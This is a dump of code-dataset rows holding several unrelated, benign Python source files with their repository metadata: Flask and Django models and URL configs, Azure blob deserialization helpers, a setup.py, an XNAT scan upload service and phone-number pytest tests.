legis = Legislator(last_name="Smith", full_name="Jane Smith", state="LA",
party="Democrat", opensecrets_id="N00003535",
govtrack_id=400050, votesmart_id=27018,
phone="504-555-5555", website="wwww.google.com")
db.session.add(legis)
db.session.commit()
def connect_to_db(app, db_uri="postgresql:///legislature"):
""" Connect database to Flask app."""
# Configure to use my PstgreSQL database
app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.app = app
db.init_app(app)
if __name__ == "__main__":
# if I run this module interactively, it will leave
# me in a state of being able to work with the database directly.
from server import app
connect_to_db(app)
print("Connected to DB.") | 33.913793 | 79 | 0.675648 |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
app = Flask(__name__)
class Legislator(db.Model):
__tablename__ = "current_legislators"
legislator_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
last_name = db.Column(db.String(25), nullable=False)
full_name = db.Column(db.String(200), nullable=False)
state = db.Column(db.String(20), nullable=False)
party = db.Column(db.String(50), nullable=False)
opensecrets_id = db.Column(db.String(10), nullable=True)
govtrack_id = db.Column(db.Integer, nullable=False)
votesmart_id = db.Column(db.Integer, nullable=True)
phone = db.Column(db.String(25), nullable=True)
website = db.Column(db.String(150), nullable=True)
def __repr__(self):
return f"Legislator: {self.full_name} party: {self.party}"
tesmart_id=27018,
phone="504-555-5555", website="wwww.google.com")
db.session.add(legis)
db.session.commit()
def connect_to_db(app, db_uri="postgresql:///legislature"):
app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.app = app
db.init_app(app)
if __name__ == "__main__":
from server import app
connect_to_db(app)
print("Connected to DB.") | true | true |
f7101db4a3c92bf5fa914e5b238683710b1a59e8 | 827 | py | Python | server/clothes_shop/urls.py | Meerkat007/Clothes-Shop-Website- | 0f5f113c49b550a593ea50c8d409e9228381a81b | [
"MIT"
] | null | null | null | server/clothes_shop/urls.py | Meerkat007/Clothes-Shop-Website- | 0f5f113c49b550a593ea50c8d409e9228381a81b | [
"MIT"
] | null | null | null | server/clothes_shop/urls.py | Meerkat007/Clothes-Shop-Website- | 0f5f113c49b550a593ea50c8d409e9228381a81b | [
"MIT"
] | null | null | null | """clothes_shop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^products/', include('products.urls')),
url(r'^admin/', admin.site.urls),
]
| 35.956522 | 79 | 0.70133 | from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^products/', include('products.urls')),
url(r'^admin/', admin.site.urls),
]
| true | true |
f7101e05d6aa3f6fae0e0f1f853fa0dab34e1ab0 | 8,060 | py | Python | sdk/storage/azure-storage-blob/azure/storage/blob/_deserialize.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/storage/azure-storage-blob/azure/storage/blob/_deserialize.py | v-xuto/azure-sdk-for-python | 9c6296d22094c5ede410bc83749e8df8694ccacc | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/storage/azure-storage-blob/azure/storage/blob/_deserialize.py | v-xuto/azure-sdk-for-python | 9c6296d22094c5ede410bc83749e8df8694ccacc | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=no-self-use
from typing import ( # pylint: disable=unused-import
Tuple, Dict, List,
TYPE_CHECKING
)
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
from ._models import BlobType, CopyProperties, ContentSettings, LeaseProperties, BlobProperties, ImmutabilityPolicy
from ._shared.models import get_enum_value
from ._shared.response_handlers import deserialize_metadata
from ._models import ContainerProperties, BlobAnalyticsLogging, Metrics, CorsRule, RetentionPolicy, \
StaticWebsite, ObjectReplicationPolicy, ObjectReplicationRule
if TYPE_CHECKING:
from ._generated.models import PageList
def deserialize_pipeline_response_into_cls(cls_method, response, obj, headers):
try:
deserialized_response = response.http_response
except AttributeError:
deserialized_response = response
return cls_method(deserialized_response, obj, headers)
def deserialize_blob_properties(response, obj, headers):
blob_properties = BlobProperties(
metadata=deserialize_metadata(response, obj, headers),
object_replication_source_properties=deserialize_ors_policies(response.http_response.headers),
**headers
)
if 'Content-Range' in headers:
if 'x-ms-blob-content-md5' in headers:
blob_properties.content_settings.content_md5 = headers['x-ms-blob-content-md5']
else:
blob_properties.content_settings.content_md5 = None
return blob_properties
def deserialize_ors_policies(policy_dictionary):
if policy_dictionary is None:
return None
# For source blobs (blobs that have policy ids and rule ids applied to them),
# the header will be formatted as "x-ms-or-<policy_id>_<rule_id>: {Complete, Failed}".
# The value of this header is the status of the replication.
or_policy_status_headers = {key: val for key, val in policy_dictionary.items()
if 'or-' in key and key != 'x-ms-or-policy-id'}
parsed_result = {}
for key, val in or_policy_status_headers.items():
# list blobs gives or-policy_rule and get blob properties gives x-ms-or-policy_rule
policy_and_rule_ids = key.split('or-')[1].split('_')
policy_id = policy_and_rule_ids[0]
rule_id = policy_and_rule_ids[1]
# If we are seeing this policy for the first time, create a new list to store rule_id -> result
parsed_result[policy_id] = parsed_result.get(policy_id) or list()
parsed_result[policy_id].append(ObjectReplicationRule(rule_id=rule_id, status=val))
result_list = [ObjectReplicationPolicy(policy_id=k, rules=v) for k, v in parsed_result.items()]
return result_list
def deserialize_blob_stream(response, obj, headers):
blob_properties = deserialize_blob_properties(response, obj, headers)
obj.properties = blob_properties
return response.http_response.location_mode, obj
def deserialize_container_properties(response, obj, headers):
metadata = deserialize_metadata(response, obj, headers)
container_properties = ContainerProperties(
metadata=metadata,
**headers
)
return container_properties
def get_page_ranges_result(ranges):
# type: (PageList) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]]
page_range = [] # type: ignore
clear_range = [] # type: List
if ranges.page_range:
page_range = [{'start': b.start, 'end': b.end} for b in ranges.page_range] # type: ignore
if ranges.clear_range:
clear_range = [{'start': b.start, 'end': b.end} for b in ranges.clear_range]
return page_range, clear_range # type: ignore
def service_stats_deserialize(generated):
"""Deserialize a ServiceStats objects into a dict.
"""
return {
'geo_replication': {
'status': generated.geo_replication.status,
'last_sync_time': generated.geo_replication.last_sync_time,
}
}
def service_properties_deserialize(generated):
"""Deserialize a ServiceProperties objects into a dict.
"""
return {
'analytics_logging': BlobAnalyticsLogging._from_generated(generated.logging), # pylint: disable=protected-access
'hour_metrics': Metrics._from_generated(generated.hour_metrics), # pylint: disable=protected-access
'minute_metrics': Metrics._from_generated(generated.minute_metrics), # pylint: disable=protected-access
'cors': [CorsRule._from_generated(cors) for cors in generated.cors], # pylint: disable=protected-access
'target_version': generated.default_service_version, # pylint: disable=protected-access
'delete_retention_policy': RetentionPolicy._from_generated(generated.delete_retention_policy), # pylint: disable=protected-access
'static_website': StaticWebsite._from_generated(generated.static_website), # pylint: disable=protected-access
}
def get_blob_properties_from_generated_code(generated):
blob = BlobProperties()
if generated.name.encoded:
blob.name = unquote(generated.name.content)
else:
blob.name = generated.name.content
blob_type = get_enum_value(generated.properties.blob_type)
blob.blob_type = BlobType(blob_type) if blob_type else None
blob.etag = generated.properties.etag
blob.deleted = generated.deleted
blob.snapshot = generated.snapshot
blob.is_append_blob_sealed = generated.properties.is_sealed
blob.metadata = generated.metadata.additional_properties if generated.metadata else {}
blob.encrypted_metadata = generated.metadata.encrypted if generated.metadata else None
blob.lease = LeaseProperties._from_generated(generated) # pylint: disable=protected-access
blob.copy = CopyProperties._from_generated(generated) # pylint: disable=protected-access
blob.last_modified = generated.properties.last_modified
blob.creation_time = generated.properties.creation_time
blob.content_settings = ContentSettings._from_generated(generated) # pylint: disable=protected-access
blob.size = generated.properties.content_length
blob.page_blob_sequence_number = generated.properties.blob_sequence_number
blob.server_encrypted = generated.properties.server_encrypted
blob.encryption_scope = generated.properties.encryption_scope
blob.deleted_time = generated.properties.deleted_time
blob.remaining_retention_days = generated.properties.remaining_retention_days
blob.blob_tier = generated.properties.access_tier
blob.rehydrate_priority = generated.properties.rehydrate_priority
blob.blob_tier_inferred = generated.properties.access_tier_inferred
blob.archive_status = generated.properties.archive_status
blob.blob_tier_change_time = generated.properties.access_tier_change_time
blob.version_id = generated.version_id
blob.is_current_version = generated.is_current_version
blob.tag_count = generated.properties.tag_count
blob.tags = parse_tags(generated.blob_tags) # pylint: disable=protected-access
blob.object_replication_source_properties = deserialize_ors_policies(generated.object_replication_metadata)
blob.last_accessed_on = generated.properties.last_accessed_on
blob.immutability_policy = ImmutabilityPolicy._from_generated(generated) # pylint: disable=protected-access
blob.has_legal_hold = generated.properties.legal_hold
blob.has_versions_only = generated.has_versions_only
return blob
def parse_tags(generated_tags):
# type: (Optional[List[BlobTag]]) -> Union[Dict[str, str], None]
"""Deserialize a list of BlobTag objects into a dict.
"""
if generated_tags:
tag_dict = {t.key: t.value for t in generated_tags.blob_tag_set}
return tag_dict
return None
| 46.057143 | 138 | 0.735732 |
from typing import (
Tuple, Dict, List,
TYPE_CHECKING
)
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
from ._models import BlobType, CopyProperties, ContentSettings, LeaseProperties, BlobProperties, ImmutabilityPolicy
from ._shared.models import get_enum_value
from ._shared.response_handlers import deserialize_metadata
from ._models import ContainerProperties, BlobAnalyticsLogging, Metrics, CorsRule, RetentionPolicy, \
StaticWebsite, ObjectReplicationPolicy, ObjectReplicationRule
if TYPE_CHECKING:
from ._generated.models import PageList
def deserialize_pipeline_response_into_cls(cls_method, response, obj, headers):
try:
deserialized_response = response.http_response
except AttributeError:
deserialized_response = response
return cls_method(deserialized_response, obj, headers)
def deserialize_blob_properties(response, obj, headers):
blob_properties = BlobProperties(
metadata=deserialize_metadata(response, obj, headers),
object_replication_source_properties=deserialize_ors_policies(response.http_response.headers),
**headers
)
if 'Content-Range' in headers:
if 'x-ms-blob-content-md5' in headers:
blob_properties.content_settings.content_md5 = headers['x-ms-blob-content-md5']
else:
blob_properties.content_settings.content_md5 = None
return blob_properties
def deserialize_ors_policies(policy_dictionary):
if policy_dictionary is None:
return None
or_policy_status_headers = {key: val for key, val in policy_dictionary.items()
if 'or-' in key and key != 'x-ms-or-policy-id'}
parsed_result = {}
for key, val in or_policy_status_headers.items():
policy_and_rule_ids = key.split('or-')[1].split('_')
policy_id = policy_and_rule_ids[0]
rule_id = policy_and_rule_ids[1]
parsed_result[policy_id] = parsed_result.get(policy_id) or list()
parsed_result[policy_id].append(ObjectReplicationRule(rule_id=rule_id, status=val))
result_list = [ObjectReplicationPolicy(policy_id=k, rules=v) for k, v in parsed_result.items()]
return result_list
def deserialize_blob_stream(response, obj, headers):
blob_properties = deserialize_blob_properties(response, obj, headers)
obj.properties = blob_properties
return response.http_response.location_mode, obj
def deserialize_container_properties(response, obj, headers):
metadata = deserialize_metadata(response, obj, headers)
container_properties = ContainerProperties(
metadata=metadata,
**headers
)
return container_properties
def get_page_ranges_result(ranges):
page_range = []
clear_range = []
if ranges.page_range:
page_range = [{'start': b.start, 'end': b.end} for b in ranges.page_range]
if ranges.clear_range:
clear_range = [{'start': b.start, 'end': b.end} for b in ranges.clear_range]
return page_range, clear_range
def service_stats_deserialize(generated):
return {
'geo_replication': {
'status': generated.geo_replication.status,
'last_sync_time': generated.geo_replication.last_sync_time,
}
}
def service_properties_deserialize(generated):
return {
'analytics_logging': BlobAnalyticsLogging._from_generated(generated.logging),
'hour_metrics': Metrics._from_generated(generated.hour_metrics),
'minute_metrics': Metrics._from_generated(generated.minute_metrics),
'cors': [CorsRule._from_generated(cors) for cors in generated.cors],
'target_version': generated.default_service_version,
'delete_retention_policy': RetentionPolicy._from_generated(generated.delete_retention_policy),
'static_website': StaticWebsite._from_generated(generated.static_website),
}
def get_blob_properties_from_generated_code(generated):
blob = BlobProperties()
if generated.name.encoded:
blob.name = unquote(generated.name.content)
else:
blob.name = generated.name.content
blob_type = get_enum_value(generated.properties.blob_type)
blob.blob_type = BlobType(blob_type) if blob_type else None
blob.etag = generated.properties.etag
blob.deleted = generated.deleted
blob.snapshot = generated.snapshot
blob.is_append_blob_sealed = generated.properties.is_sealed
blob.metadata = generated.metadata.additional_properties if generated.metadata else {}
blob.encrypted_metadata = generated.metadata.encrypted if generated.metadata else None
blob.lease = LeaseProperties._from_generated(generated)
blob.copy = CopyProperties._from_generated(generated)
blob.last_modified = generated.properties.last_modified
blob.creation_time = generated.properties.creation_time
blob.content_settings = ContentSettings._from_generated(generated)
blob.size = generated.properties.content_length
blob.page_blob_sequence_number = generated.properties.blob_sequence_number
blob.server_encrypted = generated.properties.server_encrypted
blob.encryption_scope = generated.properties.encryption_scope
blob.deleted_time = generated.properties.deleted_time
blob.remaining_retention_days = generated.properties.remaining_retention_days
blob.blob_tier = generated.properties.access_tier
blob.rehydrate_priority = generated.properties.rehydrate_priority
blob.blob_tier_inferred = generated.properties.access_tier_inferred
blob.archive_status = generated.properties.archive_status
blob.blob_tier_change_time = generated.properties.access_tier_change_time
blob.version_id = generated.version_id
blob.is_current_version = generated.is_current_version
blob.tag_count = generated.properties.tag_count
blob.tags = parse_tags(generated.blob_tags)
blob.object_replication_source_properties = deserialize_ors_policies(generated.object_replication_metadata)
blob.last_accessed_on = generated.properties.last_accessed_on
blob.immutability_policy = ImmutabilityPolicy._from_generated(generated)
blob.has_legal_hold = generated.properties.legal_hold
blob.has_versions_only = generated.has_versions_only
return blob
def parse_tags(generated_tags):
if generated_tags:
tag_dict = {t.key: t.value for t in generated_tags.blob_tag_set}
return tag_dict
return None
| true | true |
f71020a081e97b8e419611b4ff2a1a7fefc0a0c9 | 2,253 | py | Python | setup.py | SCECcode/ucvm_plotting | 0fad66043c81bdc5e616f87020f38177bdae9503 | [
"BSD-3-Clause"
] | null | null | null | setup.py | SCECcode/ucvm_plotting | 0fad66043c81bdc5e616f87020f38177bdae9503 | [
"BSD-3-Clause"
] | 4 | 2021-11-30T08:28:42.000Z | 2022-03-07T21:27:14.000Z | setup.py | SCECcode/ucvm_plotting | 0fad66043c81bdc5e616f87020f38177bdae9503 | [
"BSD-3-Clause"
] | 1 | 2021-06-05T03:28:51.000Z | 2021-06-05T03:28:51.000Z | """
@file setup.py
@brief Build and install the pycvm
@author The SCEC/UCVM Developers - <software@scec.usc.edu>
"""
from setuptools import setup
NAME = "ucvm_plotting"
FULLNAME = "ucvm_plotting with pycvm"
AUTHOR = "The SCEC/UCVM Developers"
AUTHOR_EMAIL = "software@scec.usc.edu"
MAINTAINER = AUTHOR
MAINTAINER_EMAIL = AUTHOR_EMAIL
LICENSE = "Apache 2.0 license"
URL = "https://github.com/SCEC/ucvm_plotting"
DESCRIPTION = "Python code extensions for UCVM and plotting library for the SCEC UCVM"
with open("README.md") as f:
LONG_DESCRIPTION = "".join(f.readlines())
VERSION = "0.0.2"
CLASSIFIERS = [
"Development Status :: 1 - Alpha",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Topic :: Scientific/Engineering",
"Topic :: Software Development :: Libraries",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: {}".format(LICENSE),
]
PLATFORMS = "Any"
INSTALL_REQUIRES = ["numpy", "matplotlib", "basemap", "packaging"]
KEYWORDS = ["UCVM"]
if __name__ == "__main__":
setup(
name=NAME,
fullname=FULLNAME,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
license=LICENSE,
url=URL,
platforms=PLATFORMS,
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
install_requires=INSTALL_REQUIRES,
packages=["pycvm"],
scripts=["ucvm_plotting/make_map_grid.py","ucvm_plotting/plot_compare_plot.py",
"ucvm_plotting/plot_cross_section.py","ucvm_plotting/plot_density_plot.py",
"ucvm_plotting/plot_depth_profile.py","ucvm_plotting/plot_elevation_cross_section.py",
"ucvm_plotting/plot_elevation_horizontal_slice.py","ucvm_plotting/plot_elevation_map.py",
"ucvm_plotting/plot_elevation_profile.py","ucvm_plotting/plot_horizontal_slice.py",
"ucvm_plotting/plot_scatter_plot.py","ucvm_plotting/plot_vs30_etree_map.py",
"ucvm_plotting/plot_vs30_map.py","ucvm_plotting/plot_z10_map.py",
"ucvm_plotting/plot_z25_map.py",
"utilities/makegrid.sh","utilities/view_png.py"]
)
| 33.132353 | 89 | 0.717266 |
from setuptools import setup
NAME = "ucvm_plotting"
FULLNAME = "ucvm_plotting with pycvm"
AUTHOR = "The SCEC/UCVM Developers"
AUTHOR_EMAIL = "software@scec.usc.edu"
MAINTAINER = AUTHOR
MAINTAINER_EMAIL = AUTHOR_EMAIL
LICENSE = "Apache 2.0 license"
URL = "https://github.com/SCEC/ucvm_plotting"
DESCRIPTION = "Python code extensions for UCVM and plotting library for the SCEC UCVM"
with open("README.md") as f:
LONG_DESCRIPTION = "".join(f.readlines())
VERSION = "0.0.2"
CLASSIFIERS = [
"Development Status :: 1 - Alpha",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Topic :: Scientific/Engineering",
"Topic :: Software Development :: Libraries",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: {}".format(LICENSE),
]
PLATFORMS = "Any"
INSTALL_REQUIRES = ["numpy", "matplotlib", "basemap", "packaging"]
KEYWORDS = ["UCVM"]
if __name__ == "__main__":
setup(
name=NAME,
fullname=FULLNAME,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
license=LICENSE,
url=URL,
platforms=PLATFORMS,
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
install_requires=INSTALL_REQUIRES,
packages=["pycvm"],
scripts=["ucvm_plotting/make_map_grid.py","ucvm_plotting/plot_compare_plot.py",
"ucvm_plotting/plot_cross_section.py","ucvm_plotting/plot_density_plot.py",
"ucvm_plotting/plot_depth_profile.py","ucvm_plotting/plot_elevation_cross_section.py",
"ucvm_plotting/plot_elevation_horizontal_slice.py","ucvm_plotting/plot_elevation_map.py",
"ucvm_plotting/plot_elevation_profile.py","ucvm_plotting/plot_horizontal_slice.py",
"ucvm_plotting/plot_scatter_plot.py","ucvm_plotting/plot_vs30_etree_map.py",
"ucvm_plotting/plot_vs30_map.py","ucvm_plotting/plot_z10_map.py",
"ucvm_plotting/plot_z25_map.py",
"utilities/makegrid.sh","utilities/view_png.py"]
)
| true | true |
f71022c75b49c0c56102043edb4100618ba8208a | 348 | py | Python | models.py | ashelto6/unJumble | cf557668133186e7ea419f6f08ccadef4cad89a1 | [
"MIT"
] | null | null | null | models.py | ashelto6/unJumble | cf557668133186e7ea419f6f08ccadef4cad89a1 | [
"MIT"
] | 7 | 2021-02-26T07:31:12.000Z | 2021-04-25T03:21:35.000Z | models.py | ashelto6/unJumble | cf557668133186e7ea419f6f08ccadef4cad89a1 | [
"MIT"
] | null | null | null | from flask_login import UserMixin
from . import db
#run the creat_all() command to create the database
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
last_name = db.Column(db.String(100))
first_name = db.Column(db.String(100))
email = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100)) | 31.636364 | 51 | 0.747126 | from flask_login import UserMixin
from . import db
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
last_name = db.Column(db.String(100))
first_name = db.Column(db.String(100))
email = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100)) | true | true |
f71022f0eb2883e2876c9b9966ee83e21f069013 | 6,566 | py | Python | cookiecutter_mbam/scan/service.py | tiburona/cookiecutter_mbam | 13788774a4c1426c133b3f689f98d8f0c54de9c6 | [
"BSD-3-Clause"
] | null | null | null | cookiecutter_mbam/scan/service.py | tiburona/cookiecutter_mbam | 13788774a4c1426c133b3f689f98d8f0c54de9c6 | [
"BSD-3-Clause"
] | null | null | null | cookiecutter_mbam/scan/service.py | tiburona/cookiecutter_mbam | 13788774a4c1426c133b3f689f98d8f0c54de9c6 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Scan service.
This module implements uploading a scan file to XNAT and adding a scan to the database.
Todo: Maybe the public method should be called add, and that should kick off an upload procedure, rather than the
other way around.
Todo: do we want to infer file type from extension? Or use some other method?
Todo: Right now if we use the import service XNAT is inferring its own scan id. What do we want to do about that?
Todo: if someone uploads a zip file we don't actually know that there are dicoms inside (could be NIFTI). Consider this
fact.
Todo: Upload security for zip files?
"""
import os
from cookiecutter_mbam.xnat import XNATConnection
from cookiecutter_mbam.experiment import Experiment
from cookiecutter_mbam.user import User
from .models import Scan
from .utils import gzip_file
from flask import current_app
def debug():
assert current_app.debug == False, "Don't panic! You're here by request of debug()"
class ScanService:
def __init__(self, user_id, exp_id):
self.user_id = user_id
self.user = User.get_by_id(self.user_id)
self.experiment = Experiment.get_by_id(exp_id)
self.xc = XNATConnection()
# todo: what is the actual URI of the experiment I've created? Why does it have the XNAT prefix?
# maybe that's the accessor? Is the accessor in the URI?
def upload(self, image_file):
"""The top level public method for adding a scan
Calls methods to infer file type and further process the file, generate xnat identifiers and query strings,
check what XNAT identifiers objects have, upload the scan to XNAT, add the scan to the database, and update
user, experiment, and scan database objects with their XNAT-related attributes.
:param file object image_file: the file object
:return: None
"""
file, dcm = self._process_file(image_file)
xnat_ids = self._generate_xnat_identifiers(dcm=dcm)
existing_attributes = self._check_for_existing_xnat_ids()
uris = self.xc.upload_scan(xnat_ids, existing_attributes, image_file, import_service=dcm)
scan = self._add_scan()
keywords = ['subject', 'experiment', 'scan']
self._update_database_objects(keywords=keywords, objects=[self.user, self.experiment, scan],
ids=['{}_id'.format(xnat_ids[kw]['xnat_id']) for kw in keywords], uris=uris)
def _add_scan(self):
"""Add a scan to the database
Creates the scan object, adds it to the database, and increments the parent experiment's scan count
:return: scan
"""
scan = Scan.create(experiment_id=self.experiment.id)
self.experiment.num_scans += 1
return scan
def _process_file(self, image_file):
"""Infer file type from extension and respond to file type as necessary
Uses file extension to infer whether file should be left alone or gzipped, or whether zip file will be sent to
import service.
:param file object image_file: the file object
:return: a two-tuple of the image file, and a boolean indicating the file type is dcm
:rtype: tuple
"""
image_file_name = image_file.filename
file_name, file_ext = os.path.splitext(image_file_name)
dcm = False
if file_ext == '.nii':
image_file = (gzip_file(image_file, file_name))
if file_ext == '.zip':
dcm = True
return (image_file, dcm)
def _generate_xnat_identifiers(self, dcm=False):
"""Generate object ids for use in XNAT
Creates a dictionary with keys for type of XNAT object, including subject, experiment, scan, resource and file.
The values in the dictionary are dictionaries with keys 'xnat_id' and, optionally, 'query_string'. 'xnat_id'
points to the identifier of the object in XNAT, and 'query_string' to the query that will be used in the put
request to create the object.
:return: xnat_id dictionary
:rtype: dict
"""
xnat_ids = {}
xnat_ids['subject'] = {'xnat_id': str(self.user_id).zfill(6)}
xnat_exp_id = '{}_MR{}'.format(xnat_ids['subject']['xnat_id'], self.user.num_experiments)
exp_date = self.experiment.date.strftime('%m/%d/%Y')
xnat_ids['experiment'] = {'xnat_id': xnat_exp_id, 'query_string':'?xnat:mrSessionData/date={}'.format(exp_date)}
scan_number = self.experiment.num_scans + 1
xnat_scan_id = 'T1_{}'.format(scan_number)
xnat_ids['scan'] = {'xnat_id':xnat_scan_id, 'query_string':'?xsiType=xnat:mrScanData'}
if dcm:
resource = 'DICOM'
else:
resource = 'NIFTI'
xnat_ids['resource'] = {'xnat_id': resource}
xnat_ids['file'] = {'xnat_id':'T1.nii.gz', 'query_string':'?xsi:type=xnat:mrScanData'}
return xnat_ids
def _check_for_existing_xnat_ids(self):
"""Check for existing attributes on the user and experiment
Generates a dictionary with current xnat_subject_id for the user, xnat_experiment_id for the experiment as
values if they exist (empty string if they do not exist). A private method not designed to be accessed by other
classes.
:return: a dictionary with two keys with the xnat subject id and xnat experiment id.
:rtype: dict
"""
return {k: getattr(v, k) if getattr(v, k) else '' for k, v in {'xnat_subject_id': self.user,
'xnat_experiment_id': self.experiment}.items()}
# todo: the check for existence before reassigning the values is verbose. Decide whether its important.
def _update_database_objects(self, objects=[], keywords=[], uris=[], ids=[],):
"""Update database objects
After uploading a scan, ensures that user, experient, and scan are updated in the database with their xnat uri
and xnat id.
:param list objects: user, experiment, and scan
:param list keywords: 'subject', 'experiment', and 'scan'
:param list uris: xnat uris
:param list ids: xnat ids
:return: None
"""
attributes = zip(objects, keywords, uris, ids)
for (obj, kw, uri, id) in attributes:
if not hasattr(obj, 'xnat_uri'):
obj.update({'xnat_uri': uri})
if not hasattr(obj,'xnat_{}_id'.format(kw)):
obj.update({'xnat_{}_id'.format(kw): id})
| 38.397661 | 120 | 0.655955 |
import os
from cookiecutter_mbam.xnat import XNATConnection
from cookiecutter_mbam.experiment import Experiment
from cookiecutter_mbam.user import User
from .models import Scan
from .utils import gzip_file
from flask import current_app
def debug():
assert current_app.debug == False, "Don't panic! You're here by request of debug()"
class ScanService:
def __init__(self, user_id, exp_id):
self.user_id = user_id
self.user = User.get_by_id(self.user_id)
self.experiment = Experiment.get_by_id(exp_id)
self.xc = XNATConnection()
# maybe that's the accessor? Is the accessor in the URI?
def upload(self, image_file):
file, dcm = self._process_file(image_file)
xnat_ids = self._generate_xnat_identifiers(dcm=dcm)
existing_attributes = self._check_for_existing_xnat_ids()
uris = self.xc.upload_scan(xnat_ids, existing_attributes, image_file, import_service=dcm)
scan = self._add_scan()
keywords = ['subject', 'experiment', 'scan']
self._update_database_objects(keywords=keywords, objects=[self.user, self.experiment, scan],
ids=['{}_id'.format(xnat_ids[kw]['xnat_id']) for kw in keywords], uris=uris)
def _add_scan(self):
scan = Scan.create(experiment_id=self.experiment.id)
self.experiment.num_scans += 1
return scan
def _process_file(self, image_file):
image_file_name = image_file.filename
file_name, file_ext = os.path.splitext(image_file_name)
dcm = False
if file_ext == '.nii':
image_file = (gzip_file(image_file, file_name))
if file_ext == '.zip':
dcm = True
return (image_file, dcm)
def _generate_xnat_identifiers(self, dcm=False):
xnat_ids = {}
xnat_ids['subject'] = {'xnat_id': str(self.user_id).zfill(6)}
xnat_exp_id = '{}_MR{}'.format(xnat_ids['subject']['xnat_id'], self.user.num_experiments)
exp_date = self.experiment.date.strftime('%m/%d/%Y')
xnat_ids['experiment'] = {'xnat_id': xnat_exp_id, 'query_string':'?xnat:mrSessionData/date={}'.format(exp_date)}
scan_number = self.experiment.num_scans + 1
xnat_scan_id = 'T1_{}'.format(scan_number)
xnat_ids['scan'] = {'xnat_id':xnat_scan_id, 'query_string':'?xsiType=xnat:mrScanData'}
if dcm:
resource = 'DICOM'
else:
resource = 'NIFTI'
xnat_ids['resource'] = {'xnat_id': resource}
xnat_ids['file'] = {'xnat_id':'T1.nii.gz', 'query_string':'?xsi:type=xnat:mrScanData'}
return xnat_ids
def _check_for_existing_xnat_ids(self):
return {k: getattr(v, k) if getattr(v, k) else '' for k, v in {'xnat_subject_id': self.user,
'xnat_experiment_id': self.experiment}.items()}
def _update_database_objects(self, objects=[], keywords=[], uris=[], ids=[],):
attributes = zip(objects, keywords, uris, ids)
for (obj, kw, uri, id) in attributes:
if not hasattr(obj, 'xnat_uri'):
obj.update({'xnat_uri': uri})
if not hasattr(obj,'xnat_{}_id'.format(kw)):
obj.update({'xnat_{}_id'.format(kw): id})
| true | true |
f710230f2cb958286fd2cd383520343ffe344500 | 1,403 | py | Python | tests/utils/test_phone_numbers.py | Silvian/attendance-processor | b40eacf7fe8ab9473f7a75a8c8e0cc7ac03fb507 | [
"MIT"
] | 1 | 2020-10-29T13:07:25.000Z | 2020-10-29T13:07:25.000Z | tests/utils/test_phone_numbers.py | Silvian/attendance-processor | b40eacf7fe8ab9473f7a75a8c8e0cc7ac03fb507 | [
"MIT"
] | null | null | null | tests/utils/test_phone_numbers.py | Silvian/attendance-processor | b40eacf7fe8ab9473f7a75a8c8e0cc7ac03fb507 | [
"MIT"
] | null | null | null | import pytest
from utils.phone_numbers import fix_number_formatting, validate_phone_number
@pytest.mark.parametrize(
"number, expected_result",
[
("7446123456", "07446123456"), # Test number with missing 0
("07446123456", "07446123456"), # Test number no spaces
("07446 123456", "07446123456"), # Test number with spaces
("+447446123456", "+447446123456"), # Test international number no spaces
("+447446 123456", "+447446123456"), # Test international number with spaces
("+4407446123456", "+447446123456"), # Test international number with a 0
("+44 07446 123456", "+447446123456"), # Test international number with a 0 and spaces
],
)
def test_fix_number_formatting(number, expected_result):
result = fix_number_formatting(number)
assert expected_result == result
@pytest.mark.parametrize(
"number, expected_result",
[
("07446123456", True), # Test number is valid
("074461234567", False), # Test number is too long
("+447446123456", True), # Test international number is valid
("+4407446123456", False), # Test international number contains 0
("+4474461234567", False), # Test international number is too long 0
]
)
def test_validate_phone_number(number, expected_result):
result = validate_phone_number(number)
assert expected_result == result
| 37.918919 | 95 | 0.680684 | import pytest
from utils.phone_numbers import fix_number_formatting, validate_phone_number
